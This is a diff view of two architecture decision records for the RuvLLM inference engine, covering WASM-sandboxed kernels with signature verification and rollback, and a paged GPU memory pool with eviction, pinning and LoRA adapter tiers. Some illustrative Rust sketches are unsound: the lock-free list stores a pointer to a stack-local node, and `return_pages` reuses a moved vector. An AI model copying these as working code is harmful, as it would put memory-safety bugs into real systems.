### 4.2 Manifest Schema (kernels.json)
```json
{
"$schema": "https://ruvllm.dev/schemas/kernel-pack-v1.json",
"version": "1.0.0",
"name": "ruvllm-core-kernels",
"description": "Core compute kernels for RuvLLM inference",
"min_runtime_version": "0.5.0",
"max_runtime_version": "1.0.0",
"created_at": "2026-01-18T00:00:00Z",
"author": {
"name": "RuvLLM Team",
"email": "kernels@ruvllm.dev",
"signing_key": "ed25519:AAAA..."
},
"kernels": [
{
"id": "rope_f32",
"name": "Rotary Position Embedding (FP32)",
"category": "positional_encoding",
"path": "rope/rope_f32.wasm",
"hash": "sha256:abc123...",
"entry_point": "rope_forward",
"inputs": [
{
"name": "x",
"dtype": "f32",
"shape": ["batch", "seq", "heads", "dim"]
},
{
"name": "freqs",
"dtype": "f32",
"shape": ["seq", "dim_half"]
}
],
"outputs": [
{
"name": "y",
"dtype": "f32",
"shape": ["batch", "seq", "heads", "dim"]
}
],
"params": {
"theta": {
"type": "f32",
"default": 10000.0
}
},
"resource_limits": {
"max_memory_pages": 256,
"max_epoch_ticks": 1000,
"max_table_elements": 1024
},
"platforms": {
"wasmtime": {
"min_version": "15.0.0",
"features": ["simd", "bulk-memory"]
},
"wamr": {
"min_version": "1.3.0",
"aot_available": true
}
},
"benchmarks": {
"seq_512_dim_128": {
"latency_us": 45,
"throughput_gflops": 2.1
}
}
}
],
"fallbacks": {
"rope_f32": "rope_reference",
"rmsnorm_f32": "rmsnorm_reference"
}
}
```
### 4.3 Included Kernel Packs
| Category | Kernels | Notes |
|----------|---------|-------|
| **Positional** | RoPE (f32, f16, q8) | Rotary embeddings |
| **Normalization** | RMSNorm (f32, f16) | Pre-attention normalization |
| **Activation** | SwiGLU (f32, f16) | Gated activation |
| **KV Cache** | pack_q4, pack_q8, unpack_q4, unpack_q8 | Quantize/dequantize |
| **Adapter** | LoRA apply (f32, f16) | Delta weight application |
**Attention Note**: Attention kernels remain **native** initially due to:
- Complex memory access patterns
- Heavy reliance on hardware-specific optimizations (Flash Attention, xformers)
- Significant overhead from WASM boundary crossing for large tensors
## 5. Supply Chain Security
### 5.1 Signature Verification
```rust
use ed25519_dalek::{Signature, VerifyingKey, Verifier};
pub struct KernelPackVerifier {
trusted_keys: Vec<VerifyingKey>,
}
impl KernelPackVerifier {
/// Verify kernel pack signature
pub fn verify(&self, manifest: &[u8], signature: &[u8]) -> Result<(), VerifyError> {
let sig = Signature::try_from(signature)?;
for key in &self.trusted_keys {
if key.verify(manifest, &sig).is_ok() {
return Ok(());
}
}
Err(VerifyError::NoTrustedKey)
}
/// Verify individual kernel hash
pub fn verify_kernel(&self, kernel_bytes: &[u8], expected_hash: &str) -> Result<(), VerifyError> {
use sha2::{Sha256, Digest};
let mut hasher = Sha256::new();
hasher.update(kernel_bytes);
let hash = format!("sha256:{:x}", hasher.finalize());
if hash == expected_hash {
Ok(())
} else {
Err(VerifyError::HashMismatch {
expected: expected_hash.to_string(),
actual: hash,
})
}
}
}
```
### 5.2 Version Compatibility Gates
```rust
pub struct CompatibilityChecker {
runtime_version: Version,
}
impl CompatibilityChecker {
pub fn check(&self, manifest: &KernelManifest) -> CompatibilityResult {
// Check runtime version bounds
if self.runtime_version < manifest.min_runtime_version {
return CompatibilityResult::RuntimeTooOld {
required: manifest.min_runtime_version.clone(),
actual: self.runtime_version.clone(),
};
}
if self.runtime_version > manifest.max_runtime_version {
return CompatibilityResult::RuntimeTooNew {
max_supported: manifest.max_runtime_version.clone(),
actual: self.runtime_version.clone(),
};
}
// Check WASM feature requirements
for kernel in &manifest.kernels {
if let Some(platform) = kernel.platforms.get("wasmtime") {
for feature in &platform.features {
if !self.has_feature(feature) {
return CompatibilityResult::MissingFeature {
kernel: kernel.id.clone(),
feature: feature.clone(),
};
}
}
}
}
CompatibilityResult::Compatible
}
}
```
### 5.3 Safe Rollback Protocol
```rust
pub struct KernelManager {
active_pack: Arc<RwLock<KernelPack>>,
previous_pack: Arc<RwLock<Option<KernelPack>>>,
metrics: KernelMetrics,
}
impl KernelManager {
/// Upgrade to new kernel pack with automatic rollback on failure
pub async fn upgrade(&self, new_pack: KernelPack) -> Result<(), UpgradeError> {
// Step 1: Verify new pack
self.verifier.verify(&new_pack)?;
self.compatibility.check(&new_pack.manifest)?;
// Step 2: Compile kernels (AOT if supported)
let compiled = self.compile_pack(&new_pack).await?;
// Step 3: Atomic swap with rollback capability
{
let mut active = self.active_pack.write().await;
let mut previous = self.previous_pack.write().await;
// Store current as rollback target
*previous = Some(std::mem::replace(&mut *active, compiled));
}
// Step 4: Health check with new kernels
if let Err(e) = self.health_check().await {
tracing::error!("Kernel health check failed: {}", e);
self.rollback().await?;
return Err(UpgradeError::HealthCheckFailed(e));
}
// Step 5: Clear rollback after grace period
tokio::spawn({
let previous = self.previous_pack.clone();
async move {
tokio::time::sleep(Duration::from_secs(300)).await;
*previous.write().await = None;
}
});
Ok(())
}
/// Rollback to previous kernel pack
pub async fn rollback(&self) -> Result<(), RollbackError> {
let mut active = self.active_pack.write().await;
let mut previous = self.previous_pack.write().await;
if let Some(prev) = previous.take() {
*active = prev;
tracing::info!("Rolled back to previous kernel pack");
Ok(())
} else {
Err(RollbackError::NoPreviousPack)
}
}
}
```
## 6. Device Class Configurations
### 6.1 Edge Server Configuration (Wasmtime + Epoch)
```rust
pub fn create_server_runtime() -> Result<WasmRuntime, RuntimeError> {
let mut config = Config::new();
// Performance optimizations
config.cranelift_opt_level(OptLevel::Speed);
config.cranelift_nan_canonicalization(false);
config.parallel_compilation(true);
// SIMD support for vectorized operations
config.wasm_simd(true);
config.wasm_bulk_memory(true);
config.wasm_multi_value(true);
// Memory configuration
config.static_memory_maximum_size(1 << 32); // 4GB max
config.dynamic_memory_guard_size(1 << 16); // 64KB guard
// Epoch-based interruption
config.epoch_interruption(true);
let engine = Engine::new(&config)?;
Ok(WasmRuntime {
engine,
epoch_tick_interval: Duration::from_millis(10),
default_epoch_budget: 1000, // 10 seconds max
})
}
```
### 6.2 Embedded Configuration (WAMR AOT)
```rust
pub fn create_embedded_runtime() -> Result<WamrRuntime, RuntimeError> {
let mut config = WamrConfig::new();
// Minimal footprint configuration
config.set_stack_size(32 * 1024); // 32KB stack
config.set_heap_size(128 * 1024); // 128KB heap
config.enable_aot(true); // Pre-compiled modules
config.enable_simd(false); // Often unavailable on MCU
config.enable_bulk_memory(true);
// Interpreter fallback for debugging
config.enable_interp(cfg!(debug_assertions));
// Execution limits
config.set_exec_timeout_ms(100); // 100ms max per invocation
Ok(WamrRuntime::new(config)?)
}
```
### 6.3 WASI Threads (Optional)
For platforms supporting WASI threads:
```rust
pub fn create_threaded_runtime() -> Result<WasmRuntime, RuntimeError> {
let mut config = Config::new();
// Enable threading support
config.wasm_threads(true);
config.wasm_shared_memory(true);
// Thread pool configuration
config.async_support(true);
config.max_wasm_threads(4);
let engine = Engine::new(&config)?;
Ok(WasmRuntime {
engine,
thread_pool_size: 4,
})
}
```
**Platform Support Matrix**:
| Platform | WASI Threads | Notes |
|----------|--------------|-------|
| Linux x86_64 | Yes | Full support |
| Linux ARM64 | Yes | Full support |
| macOS | Yes | Full support |
| Windows | Yes | Full support |
| WAMR | No | Single-threaded only |
| Browser | Yes | Via SharedArrayBuffer |
## 7. Performance Considerations
### 7.1 Invocation Overhead
| Operation | Latency | Notes |
|-----------|---------|-------|
| Kernel lookup | ~100ns | Hash table lookup |
| Instance creation | ~1us | Pre-compiled module |
| Memory setup | ~500ns | Shared memory mapping |
| Epoch check | ~2ns | Single atomic read |
| Return value | ~100ns | Register transfer |
| **Total** | **~2us** | Per invocation |
### 7.2 Optimization Strategies
1. **Module Caching**: Pre-compile and cache WASM modules
2. **Instance Pooling**: Reuse instances across invocations
3. **Memory Sharing**: Map host tensors directly into WASM linear memory
4. **Batch Invocations**: Process multiple requests per kernel call
### 7.3 When to Bypass WASM
WASM sandboxing should be bypassed (with explicit opt-in) for:
- Attention kernels (complex memory patterns)
- Large matrix multiplications (>1000x1000)
- Operations with <1ms latency requirements
- Trusted, verified native kernels
## 8. Alternatives Considered
### 8.1 eBPF
| Aspect | eBPF | WASM |
|--------|------|------|
| Platform | Linux only | Cross-platform |
| Verification | Static, strict | Dynamic, flexible |
| Memory model | Constrained | Linear memory |
| Tooling | Improving | Mature |
**Decision**: WASM chosen for cross-platform support.
### 8.2 Lua/LuaJIT
| Aspect | Lua | WASM |
|--------|-----|------|
| Performance | Good (JIT) | Excellent (AOT) |
| Sandboxing | Manual effort | Built-in |
| Type safety | Dynamic | Static |
| Ecosystem | Large | Growing |
**Decision**: WASM chosen for type safety and native compilation.
### 8.3 Native Plugins with seccomp
| Aspect | seccomp | WASM |
|--------|---------|------|
| Isolation | Process-level | In-process |
| Overhead | IPC cost | Minimal |
| Portability | Linux only | Cross-platform |
| Complexity | High | Moderate |
**Decision**: WASM chosen for in-process efficiency and portability.
## 9. Consequences
### 9.1 Positive
- **Security**: Strong isolation prevents kernel code from compromising host
- **Portability**: Same kernels run on servers and embedded devices
- **Hot Updates**: Kernels can be updated without service restart
- **Ecosystem**: Large WASM toolchain and community support
- **Auditability**: WASM modules can be inspected and verified
### 9.2 Negative
- **Overhead**: ~2us per invocation vs. native direct call
- **Complexity**: Additional abstraction layer to maintain
- **Tooling**: WASM debugging tools less mature than native
- **Learning Curve**: Team needs WASM expertise
### 9.3 Risks
| Risk | Likelihood | Impact | Mitigation |
|------|------------|--------|------------|
| Performance regression | Medium | High | Benchmark suite, native fallbacks |
| WASI-NN instability | Low | Medium | Abstract behind internal API |
| Supply chain attack | Low | Critical | Signature verification, trusted keys |
| Epoch timing variability | Medium | Low | Generous budgets, monitoring |
## 10. Implementation Plan
### Phase 1: Foundation (Weeks 1-2)
- [ ] Set up Wasmtime integration
- [ ] Implement kernel descriptor ABI
- [ ] Create basic kernel loader
### Phase 2: Core Kernels (Weeks 3-4)
- [ ] Implement RoPE kernel
- [ ] Implement RMSNorm kernel
- [ ] Implement SwiGLU kernel
### Phase 3: KV Cache (Weeks 5-6)
- [ ] Implement quantization kernels
- [ ] Implement dequantization kernels
- [ ] Integration with cache manager
### Phase 4: Security (Weeks 7-8)
- [ ] Implement signature verification
- [ ] Create version compatibility checker
- [ ] Build rollback system
### Phase 5: Embedded (Weeks 9-10)
- [ ] WAMR integration
- [ ] AOT compilation pipeline
- [ ] Resource-constrained testing
## 11. References
- [Wasmtime Documentation](https://docs.wasmtime.dev/)
- [WAMR Documentation](https://github.com/bytecodealliance/wasm-micro-runtime)
- [WASI-NN Specification](https://github.com/WebAssembly/wasi-nn)
- [WebAssembly Security Model](https://webassembly.org/docs/security/)
- [Component Model Proposal](https://github.com/WebAssembly/component-model)
## 12. Appendix
### A. Kernel Interface Definition
```rust
/// Standard kernel interface (exported by WASM modules)
#[link(wasm_import_module = "ruvllm")]
extern "C" {
/// Initialize kernel with parameters
fn kernel_init(params_ptr: *const u8, params_len: u32) -> i32;
/// Execute kernel forward pass
fn kernel_forward(desc_ptr: *const KernelDescriptor) -> i32;
/// Execute kernel backward pass (optional)
fn kernel_backward(desc_ptr: *const KernelDescriptor) -> i32;
/// Get kernel metadata
fn kernel_info(info_ptr: *mut KernelInfo) -> i32;
/// Cleanup kernel resources
fn kernel_cleanup() -> i32;
}
```
### B. Error Codes
| Code | Name | Description |
|------|------|-------------|
| 0 | OK | Success |
| 1 | INVALID_INPUT | Invalid input tensor |
| 2 | INVALID_OUTPUT | Invalid output tensor |
| 3 | INVALID_PARAMS | Invalid kernel parameters |
| 4 | OUT_OF_MEMORY | Insufficient memory |
| 5 | NOT_IMPLEMENTED | Operation not supported |
| 6 | INTERNAL_ERROR | Internal kernel error |
### C. Benchmark Template
```rust
#[cfg(test)]
mod benchmarks {
use criterion::{criterion_group, criterion_main, Criterion};
fn bench_rope_f32(c: &mut Criterion) {
let runtime = create_server_runtime().unwrap();
let kernel = runtime.load_kernel("rope_f32").unwrap();
let input = Tensor::random([1, 512, 32, 128], DType::F32);
let freqs = Tensor::random([512, 64], DType::F32);
c.bench_function("rope_f32_seq512", |b| {
b.iter(|| {
kernel.forward(&input, &freqs).unwrap()
})
});
}
criterion_group!(benches, bench_rope_f32);
criterion_main!(benches);
}
```
---
## Related Decisions
- **ADR-001**: Ruvector Core Architecture
- **ADR-002**: RuvLLM Integration
- **ADR-003**: SIMD Optimization Strategy
- **ADR-007**: Security Review & Technical Debt
---
## Security Status (v2.1)
| Component | Status | Notes |
|-----------|--------|-------|
| SharedArrayBuffer | ✅ Secure | Safety documentation for race conditions |
| WASM Memory | ✅ Secure | Bounds checking via WASM sandbox |
| Kernel Loading | ⚠️ Planned | Signature verification pending |
**Fixes Applied:**
- Added comprehensive safety comments documenting race condition prevention in `shared.rs`
- JavaScript/WASM coordination patterns documented
**Outstanding Items:**
- TD-007 (P2): Embedded JavaScript should be extracted to separate files
See ADR-007 for full security audit trail.
---
## Revision History
| Version | Date | Author | Changes |
|---------|------|--------|---------|
| 1.0 | 2026-01-18 | RuVector Architecture Team | Initial version |
| 1.1 | 2026-01-19 | Security Review Agent | Added security status, related decisions |

View File

@@ -0,0 +1,910 @@
# ADR-006: Unified Memory Pool and Paging Strategy
| Field | Value |
|-------|-------|
| **Status** | Proposed |
| **Date** | 2026-01-18 |
| **Authors** | Architecture Team |
| **Reviewers** | Performance Engineering, ML Infrastructure |
| **Supersedes** | None |
| **Related** | ADR-003 (KV Cache), ADR-005 (LoRA Adapter Loading) |
**Note**: The memory pool and paging strategy described here is complemented by ADR-029. The RVF segment model provides memory management through append-only segments with temperature-tiered quantization.
## 1. Context and Problem Statement
Modern LLM inference systems face significant memory management challenges when serving multiple concurrent requests with varying adapter configurations. The S-LoRA paper demonstrated that a unified memory pool approach can dramatically improve throughput and reduce fragmentation compared to traditional per-request allocation.
### Current Challenges
1. **Memory Fragmentation**: Traditional allocators suffer from fragmentation when managing:
- Variable-length KV cache sequences
- Multiple LoRA adapter weights of different ranks
- Temporary computation buffers
2. **Multi-Tenant Requirements**: Production systems must support:
- Thousands of concurrent LoRA adapters
- Heterogeneous batch sizes and sequence lengths
- Dynamic adapter hot-swapping without service interruption
3. **Performance Constraints**:
- GPU memory bandwidth is the primary bottleneck
- Allocation latency must be sub-microsecond for inference paths
- Memory utilization must exceed 90% to be cost-effective
### Key Insights from S-LoRA
S-LoRA's unified memory pool architecture demonstrated:
- 30x throughput improvement over naive per-adapter allocation
- Near-zero fragmentation through page-based management
- Efficient heterogeneous batching across adapter variants
## 2. Decision Drivers
- **DR-1**: Maximize GPU memory utilization (target: >95%)
- **DR-2**: Support 10,000+ concurrent LoRA adapters
- **DR-3**: Sub-microsecond allocation latency for hot paths
- **DR-4**: Zero-copy semantics where possible
- **DR-5**: Graceful degradation under memory pressure
- **DR-6**: Support heterogeneous tensor sizes without fragmentation
## 3. Considered Options
### Option A: Traditional Per-Request Allocator
- Standard cudaMalloc/cudaFree per request
- Simple implementation
- **Rejected**: Severe fragmentation, high allocation latency
### Option B: Slab Allocator with Fixed Size Classes
- Pre-defined size buckets (power-of-2)
- Low fragmentation within classes
- **Rejected**: Poor fit for variable-length KV caches
### Option C: Unified Paged Memory Pool (Selected)
- Single arena for all tensor types
- Page-granular allocation
- Reference-counted pinning
- LRU eviction with hysteresis
### Option D: Virtual Memory with Demand Paging
- Leverage CUDA virtual memory APIs
- Over-commit with page faults
- **Rejected**: Page fault latency incompatible with inference SLOs
## 4. Decision
We adopt **Option C: Unified Paged Memory Pool** with the following specifications.
### 4.1 Page Size Configuration
```
Default Page Size: 2 MB
Configurable Range: 512 KB - 4 MB
Page Alignment: 256 bytes (GPU cache line)
```
**Rationale for 2MB default**:
- Matches CUDA large page size for optimal TLB usage
- Balances internal fragmentation vs. metadata overhead
- Sufficient granularity for typical LoRA adapter sizes (rank 8-64)
### 4.2 Unified Pool Architecture
```
+------------------------------------------------------------------+
| UNIFIED MEMORY POOL |
+------------------------------------------------------------------+
| Page 0 | Page 1 | Page 2 | ... | Page N-1 | |
| [KV-A] | [KV-A] | [LoRA-1] | | [Temp] | |
| pinned | pinned | pinned | free | unpinned | |
+------------------------------------------------------------------+
|
v
+------------------------------------------------------------------+
| PAGE METADATA TABLE |
+------------------------------------------------------------------+
| Page ID | Status | Content Type | Ref Count | Last Access | ... |
|---------|----------|--------------|-----------|-------------|-----|
| 0 | PINNED | KV_CACHE | 3 | T+0 | |
| 1 | PINNED | KV_CACHE | 3 | T+0 | |
| 2 | PINNED | LORA_WEIGHT | 1 | T-100ms | |
| 3 | FREE | - | 0 | - | |
| N-1 | UNPINNED | TEMP_BUFFER | 0 | T-500ms | |
+------------------------------------------------------------------+
```
### 4.3 Content Types
| Type | Description | Typical Size | Pin Duration |
|------|-------------|--------------|--------------|
| `KV_CACHE` | Key-value cache for attention | 1-100+ pages | Request lifetime |
| `LORA_WEIGHT` | LoRA adapter A/B matrices | 1-8 pages | Variable (hot/cold) |
| `TEMP_BUFFER` | Scratch space for computation | 1-4 pages | Kernel duration |
| `ACTIVATION` | Intermediate activations | 2-16 pages | Layer duration |
| `GRADIENT` | Gradient buffers (training) | Varies | Backward pass |
## 5. Allocation Strategy
### 5.1 Allocation Algorithm
```python
def allocate_pages(num_pages: int, content_type: ContentType) -> PageRange:
"""
Allocate contiguous page range using best-fit strategy.
Algorithm:
1. Try thread-local free cache (fast path)
2. Search global free list for best-fit range
3. If insufficient free pages, trigger eviction
4. Return contiguous PageRange or raise OOM
"""
# Fast path: thread-local cache
if thread_cache.has_contiguous(num_pages):
return thread_cache.pop(num_pages)
# Global free list with best-fit
with global_freelist.try_lock():
range = global_freelist.best_fit(num_pages)
if range:
return range
# Eviction required
evicted = eviction_policy.evict_until_free(num_pages)
return global_freelist.allocate_after_eviction(num_pages)
```
### 5.2 Best-Fit vs First-Fit Analysis
| Strategy | Fragmentation | Search Time | Use Case |
|----------|---------------|-------------|----------|
| First-Fit | Higher | O(1) amortized | High-throughput, uniform sizes |
| Best-Fit | Lower | O(log N) | Variable sizes, long-running |
**Decision**: Use **best-fit** as default due to heterogeneous tensor sizes. Provide first-fit option for latency-critical paths.
### 5.3 Lock-Free Free List
```rust
struct LockFreePageList {
head: AtomicPtr<PageNode>,
size: AtomicUsize,
}
impl LockFreePageList {
fn push(&self, page: PageId) {
loop {
let old_head = self.head.load(Ordering::Acquire);
let new_node = PageNode { page, next: old_head };
if self.head.compare_exchange_weak(
old_head,
&new_node,
Ordering::Release,
Ordering::Relaxed
).is_ok() {
self.size.fetch_add(1, Ordering::Relaxed);
return;
}
}
}
fn pop(&self) -> Option<PageId> {
loop {
let old_head = self.head.load(Ordering::Acquire);
if old_head.is_null() {
return None;
}
let next = unsafe { (*old_head).next };
if self.head.compare_exchange_weak(
old_head,
next,
Ordering::Release,
Ordering::Relaxed
).is_ok() {
self.size.fetch_sub(1, Ordering::Relaxed);
return Some(unsafe { (*old_head).page });
}
}
}
}
```
## 6. Pinning Rules
### 6.1 Pin States
```
+----------+
| FREE |
+----+-----+
|
| allocate()
v
+----------+
+--->| UNPINNED |<---+
| +----+-----+ |
| | |
| unpin() | pin() | evict()
| v |
| +----------+ |
+----| PINNED |----+
+----------+
```
### 6.2 Reference Counting
```rust
struct PageMetadata {
status: AtomicU8, // FREE, UNPINNED, PINNED
content_type: ContentType,
ref_count: AtomicU32, // Pin reference count
last_access: AtomicU64, // Timestamp for LRU
owner_id: u64, // Request/adapter ID
}
impl PageMetadata {
fn pin(&self) -> Result<(), PinError> {
loop {
let count = self.ref_count.load(Ordering::Acquire);
if self.status.load(Ordering::Acquire) == Status::FREE {
return Err(PinError::PageFreed);
}
if self.ref_count.compare_exchange_weak(
count,
count + 1,
Ordering::Release,
Ordering::Relaxed
).is_ok() {
self.status.store(Status::PINNED, Ordering::Release);
return Ok(());
}
}
}
fn unpin(&self) {
let prev = self.ref_count.fetch_sub(1, Ordering::Release);
if prev == 1 {
self.status.store(Status::UNPINNED, Ordering::Release);
}
}
}
```
### 6.3 Pinning Rules by Content Type
| Content Type | Auto-Pin Duration | Manual Unpin Required |
|--------------|-------------------|----------------------|
| KV_CACHE | Request lifetime | No (RAII handle) |
| LORA_WEIGHT | While in active batch | Yes |
| TEMP_BUFFER | Kernel execution | No (RAII handle) |
| ACTIVATION | Forward/backward pass | No (RAII handle) |
## 7. Eviction Policy
### 7.1 LRU with Size-Awareness
```python
class EvictionPolicy:
def __init__(self, hysteresis_factor: float = 0.1):
self.hysteresis = hysteresis_factor
self.eviction_queue = PriorityQueue() # Min-heap by score
def compute_score(self, page: PageMetadata) -> float:
"""
Eviction score: lower = more likely to evict
Score = recency_weight * (1 / time_since_access)
+ size_weight * (pages_in_block / total_pages)
+ priority_weight * content_type_priority
"""
recency = 1.0 / (current_time - page.last_access + 1)
size_factor = page.block_size / self.total_pages
priority = CONTENT_PRIORITY[page.content_type]
return (0.6 * recency + 0.2 * size_factor + 0.2 * priority)
def evict_until_free(self, required_pages: int) -> List[PageRange]:
"""
Evict pages until required_pages are free.
Uses hysteresis to prevent thrashing.
"""
target = required_pages * (1 + self.hysteresis)
evicted = []
while self.free_pages < target:
candidate = self.eviction_queue.pop_min()
if candidate.ref_count > 0:
continue # Skip pinned pages
# Evict the page
self.free_page(candidate)
evicted.append(candidate)
return evicted
```
### 7.2 Content Type Priorities
| Priority | Content Type | Eviction Preference |
|----------|--------------|---------------------|
| 1 (lowest) | TEMP_BUFFER | Evict first |
| 2 | ACTIVATION | Evict second |
| 3 | LORA_WEIGHT (cold) | Evict third |
| 4 | LORA_WEIGHT (warm) | Prefer to keep |
| 5 (highest) | KV_CACHE | Evict last |
### 7.3 Hysteresis Mechanism
```
Memory Pressure vs. Eviction Rate
Eviction | ____________________
Rate | /
| /
| /
| _____/
| /
|_________/
+------------------------------------------------
Low Medium High Critical
Memory Pressure
Hysteresis Band: Prevents oscillation between evict/allocate cycles
- Start eviction at 90% utilization
- Continue until 80% utilization
- Resume eviction only when pressure returns to 90%
```
## 8. Concurrency Model
### 8.1 Lock Hierarchy
```
Level 1 (Global): [Eviction Mutex]
|
Level 2 (Per-Region): [Region Lock 0] [Region Lock 1] ... [Region Lock N]
|
Level 3 (Per-Thread): [Thread Cache 0] [Thread Cache 1] ... [Thread Cache M]
```
### 8.2 Lightweight Eviction Mutex
```rust
struct EvictionCoordinator {
mutex: Mutex<()>,
in_progress: AtomicBool,
waiting_threads: AtomicUsize,
}
impl EvictionCoordinator {
fn maybe_evict(&self, required: usize) -> bool {
// Fast path: no eviction needed
if self.free_pages() >= required {
return true;
}
// Check if eviction already in progress
if self.in_progress.load(Ordering::Acquire) {
self.waiting_threads.fetch_add(1, Ordering::Relaxed);
while self.in_progress.load(Ordering::Acquire) {
std::hint::spin_loop();
}
self.waiting_threads.fetch_sub(1, Ordering::Relaxed);
return self.free_pages() >= required;
}
// Acquire eviction lock
let _guard = self.mutex.lock();
self.in_progress.store(true, Ordering::Release);
// Perform eviction
self.evict_pages(required);
self.in_progress.store(false, Ordering::Release);
true
}
}
```
### 8.3 Per-Thread Free Page Cache
```rust
thread_local! {
static PAGE_CACHE: RefCell<ThreadPageCache> = RefCell::new(
ThreadPageCache::new(THREAD_CACHE_SIZE)
);
}
struct ThreadPageCache {
pages: Vec<PageId>,
max_size: usize,
}
impl ThreadPageCache {
fn allocate(&mut self, count: usize) -> Option<Vec<PageId>> {
if self.pages.len() >= count {
Some(self.pages.drain(..count).collect())
} else {
None
}
}
fn return_pages(&mut self, pages: Vec<PageId>) {
let space = self.max_size - self.pages.len();
let to_cache = pages.len().min(space);
self.pages.extend(pages.into_iter().take(to_cache));
// Return excess to global pool
if pages.len() > to_cache {
global_pool.return_pages(&pages[to_cache..]);
}
}
}
```
### 8.4 Two-Phase Kernel Activation
For GPU kernel updates that depend on page mappings:
```rust
enum ActivationPhase {
Prepare, // Acquire pages, update metadata
Commit, // Make visible to GPU kernels
Rollback, // On failure, release pages
}
impl PageAllocator {
fn two_phase_allocate(&self, request: AllocationRequest) -> TwoPhaseHandle {
// Phase 1: Prepare
let pages = self.allocate_internal(request.size)?;
let handle = TwoPhaseHandle::new(pages, ActivationPhase::Prepare);
handle
}
fn commit(&self, handle: &mut TwoPhaseHandle) {
// Phase 2: Commit - atomic visibility update
memory_fence();
for page in &handle.pages {
self.page_table.make_visible(page);
}
handle.phase = ActivationPhase::Commit;
}
fn rollback(&self, handle: TwoPhaseHandle) {
// Rollback - return pages to free list
for page in handle.pages {
self.free_page(page);
}
}
}
```
## 9. Multi-Tenant Adapter Serving
### 9.1 Adapter Residency Tiers
```
+------------------+ +-----------------+ +------------------+
| HOT TIER | | WARM TIER | | COLD TIER |
| (GPU Memory) | | (CPU Memory) | | (Disk/NVMe) |
+------------------+ +-----------------+ +------------------+
| fp16 weights | | int8 weights | | Compressed |
| Instant access | | ~1ms load time | | ~10ms load time |
| Top 100 adapters| | Next 1000 | | Remaining |
+------------------+ +-----------------+ +------------------+
^ ^ ^
| | |
+-------[Promotion]-----+-------[Promotion]-----+
| | |
+------[Demotion]-------+------[Demotion]-------+
```
### 9.2 Residency Rules
```python
class AdapterResidencyManager:
def __init__(self):
self.hot_budget = 100 # Max adapters in GPU
self.warm_budget = 1000 # Max adapters in CPU
self.access_window = 60 # seconds
def compute_residency(self, adapter: Adapter) -> Tier:
"""
Determine optimal residency tier based on usage patterns.
"""
recent_accesses = adapter.accesses_in_window(self.access_window)
if recent_accesses >= 10:
return Tier.HOT
elif recent_accesses >= 1:
return Tier.WARM
else:
return Tier.COLD
def rebalance(self):
"""
Periodic rebalancing of adapters across tiers.
"""
all_adapters = sorted(
self.adapters,
key=lambda a: a.access_frequency,
reverse=True
)
# Assign to tiers
for i, adapter in enumerate(all_adapters):
if i < self.hot_budget:
self.promote_to_hot(adapter)
elif i < self.hot_budget + self.warm_budget:
self.move_to_warm(adapter)
else:
self.demote_to_cold(adapter)
```
### 9.3 Heterogeneous Batching (S-LoRA Style)
```python
class HeterogeneousBatcher:
"""
Batch requests with different LoRA adapters together.
Uses BGMV (Batched Gather Matrix-Vector) for efficiency.
"""
def __init__(self, max_batch_size: int = 256):
self.max_batch = max_batch_size
self.pending_requests = defaultdict(list)
def add_request(self, request: InferenceRequest):
adapter_id = request.adapter_id or "base"
self.pending_requests[adapter_id].append(request)
def form_batch(self) -> HeterogeneousBatch:
"""
Form a batch that may contain multiple adapters.
"""
batch = HeterogeneousBatch()
# Sort adapters by pending request count
adapters = sorted(
self.pending_requests.items(),
key=lambda x: len(x[1]),
reverse=True
)
for adapter_id, requests in adapters:
available_slots = self.max_batch - len(batch)
if available_slots <= 0:
break
# Add requests from this adapter
to_add = requests[:available_slots]
batch.add_adapter_requests(adapter_id, to_add)
# Update pending
self.pending_requests[adapter_id] = requests[available_slots:]
return batch
```
### 9.4 Adapter Compression
```rust
struct AdapterCompressor {
compression_threshold: Duration, // Compress after idle for this long
}
impl AdapterCompressor {
fn maybe_compress(&self, adapter: &mut Adapter) -> bool {
if adapter.last_access.elapsed() < self.compression_threshold {
return false;
}
match adapter.precision {
Precision::FP16 => {
// Compress to INT8 for warm tier
adapter.weights = quantize_to_int8(&adapter.weights);
adapter.precision = Precision::INT8;
true
}
Precision::INT8 => {
// Already compressed
false
}
}
}
fn decompress_for_use(&self, adapter: &mut Adapter) {
if adapter.precision == Precision::INT8 {
adapter.weights = dequantize_to_fp16(&adapter.weights);
adapter.precision = Precision::FP16;
}
}
}
```
## 10. API Design
### 10.1 Core Interfaces
```rust
pub trait MemoryPool {
/// Allocate contiguous pages
fn allocate(&self, pages: usize, content_type: ContentType) -> Result<PageRange, AllocError>;
/// Free pages back to pool
fn free(&self, range: PageRange);
/// Pin pages (prevent eviction)
fn pin(&self, range: &PageRange) -> PinGuard;
/// Get pool statistics
fn stats(&self) -> PoolStats;
}
pub trait EvictionPolicy {
/// Select pages for eviction
fn select_victims(&self, required: usize) -> Vec<PageId>;
/// Notify of page access (for LRU tracking)
fn touch(&self, page: PageId);
/// Update eviction parameters
fn configure(&mut self, config: EvictionConfig);
}
pub trait AdapterManager {
/// Load adapter into appropriate tier
fn load(&self, adapter_id: &str) -> Result<AdapterHandle, LoadError>;
/// Unload adapter (may stay cached)
fn unload(&self, handle: AdapterHandle);
/// Get adapter for inference (promotes if needed)
fn acquire(&self, adapter_id: &str) -> Result<ActiveAdapter, AcquireError>;
/// Release adapter after inference
fn release(&self, adapter: ActiveAdapter);
}
```
### 10.2 RAII Handles
```rust
/// RAII guard that automatically unpins on drop
pub struct PinGuard<'a> {
pool: &'a MemoryPool,
range: PageRange,
}
impl<'a> Drop for PinGuard<'a> {
fn drop(&mut self) {
self.pool.unpin(&self.range);
}
}
/// RAII handle for allocated pages
pub struct AllocationHandle {
pool: Arc<MemoryPool>,
range: PageRange,
pin_guard: Option<PinGuard>,
}
impl Drop for AllocationHandle {
fn drop(&mut self) {
self.pin_guard.take(); // Unpin first
self.pool.free(self.range.clone());
}
}
```
## 11. Metrics and Observability
### 11.1 Key Metrics
| Metric | Description | Target |
|--------|-------------|--------|
| `pool_utilization` | Percentage of pages in use | >95% |
| `allocation_latency_p99` | 99th percentile allocation time | <1us |
| `eviction_rate` | Pages evicted per second | Minimize |
| `fragmentation_ratio` | Largest free block / total free | >0.8 |
| `pin_contention` | Pin operation retries | <0.1% |
| `adapter_hit_rate` | Hot tier hit rate | >90% |
### 11.2 Prometheus Metrics
```rust
lazy_static! {
static ref POOL_UTILIZATION: Gauge = register_gauge!(
"ruvector_memory_pool_utilization",
"Percentage of memory pool in use"
).unwrap();
static ref ALLOCATION_LATENCY: Histogram = register_histogram!(
"ruvector_allocation_latency_seconds",
"Time to allocate pages",
vec![0.0000001, 0.000001, 0.00001, 0.0001, 0.001]
).unwrap();
